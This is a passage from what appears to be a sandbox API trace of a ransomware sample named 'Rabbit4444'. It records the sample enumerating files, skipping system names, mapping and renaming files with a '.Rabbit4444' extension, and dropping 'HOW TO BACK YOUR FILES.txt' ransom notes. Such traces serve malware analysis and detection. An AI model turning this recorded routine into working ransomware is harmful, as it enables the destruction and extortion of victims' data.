lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.883] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.883] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.883] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.883] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.883] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9a905e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9a905e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9d3350, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.883] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.883] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.883] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x992278f7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x992278f7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0060.883] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0060.883] lstrcpyW (in: lpString1=0x130ebe2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0060.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0060.884] lstrlenW (lpString="roaming.lock") returned 12 [0060.884] lstrlenW (lpString="Rabbit4444") returned 10 [0060.884] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0060.884] lstrlenW (lpString=".dll") returned 4 [0060.884] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0060.884] lstrlenW (lpString=".lnk") returned 4 [0060.884] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0060.884] lstrlenW (lpString=".ini") returned 4 [0060.884] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0060.884] lstrlenW (lpString=".sys") returned 4 [0060.884] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0060.884] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdaaf640d, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0060.884] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0060.885] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0060.885] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0060.885] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0060.885] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0060.885] lstrlenW (lpString="settings.dat") returned 12 [0060.885] lstrlenW (lpString="Rabbit4444") returned 10 [0060.885] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0060.885] lstrlenW (lpString=".dll") returned 4 [0060.885] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0060.885] lstrlenW (lpString=".lnk") returned 4 [0060.885] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0060.885] lstrlenW (lpString=".ini") returned 4 [0060.885] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0060.885] lstrlenW (lpString=".sys") returned 4 [0060.885] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0060.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.885] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.885] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15219625723) returned 1 [0060.886] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0060.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0060.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0060.886] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0060.887] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0060.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0060.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0060.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0060.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0060.889] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15219991502) returned 1 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0060.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0060.889] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.889] CloseHandle (hObject=0x29c) returned 1 [0060.890] CloseHandle (hObject=0x2a0) returned 1 [0060.890] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 108 [0060.890] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0060.890] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda67dd8b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda67dd8b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda67dd8b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0060.890] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.890] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.890] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0060.890] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0060.890] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0060.891] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0060.891] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0060.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0060.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0060.892] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0060.892] lstrlenW (lpString="Rabbit4444") returned 10 [0060.892] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0060.892] lstrlenW (lpString=".dll") returned 4 [0060.892] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0060.892] lstrlenW (lpString=".lnk") returned 4 [0060.892] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0060.892] lstrlenW (lpString=".ini") returned 4 [0060.892] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0060.892] lstrlenW (lpString=".sys") returned 4 [0060.892] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0060.892] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.892] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.892] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15220307442) returned 1 [0060.892] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0060.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0060.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0060.893] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0060.893] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0060.894] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0060.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0060.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0060.895] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0060.895] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15220572055) returned 1 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0060.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0060.895] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.895] CloseHandle (hObject=0x29c) returned 1 [0060.895] CloseHandle (hObject=0x2a0) returned 1 [0060.895] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 113 [0060.895] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0060.896] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda67dd8b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda67dd8b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda67dd8b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0060.896] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0060.896] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0060.896] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0060.897] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0060.897] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0060.897] lstrlenW (lpString="Rabbit4444") returned 10 [0060.897] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0060.897] lstrlenW (lpString=".dll") returned 4 [0060.897] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0060.897] lstrlenW (lpString=".lnk") returned 4 [0060.897] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0060.897] lstrlenW (lpString=".ini") returned 4 [0060.897] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0060.897] lstrlenW (lpString=".sys") returned 4 [0060.897] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0060.897] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda67dd8b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda67dd8b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda67dd8b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0060.897] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0060.897] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.898] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.898] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.899] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.899] CloseHandle (hObject=0x2a0) returned 1 [0060.899] CloseHandle (hObject=0x27c) returned 1 [0060.899] GetCurrentThreadId () returned 0xd98 [0060.899] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0060.899] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState" [0060.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0060.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState" [0060.899] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\" [0060.899] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0060.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.901] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.903] FlushFileBuffers (hFile=0x27c) returned 1 [0060.905] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.906] CloseHandle (hObject=0x27c) returned 1 [0060.906] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState") returned 88 [0060.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.906] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c1412, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9f55bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0060.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.906] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.906] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.906] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.906] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c1412, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9f55bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.906] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.907] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.907] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.907] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.907] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.907] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9f55bd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9f55bd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9f55bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.907] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.907] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.907] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9f55bd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9f55bd, 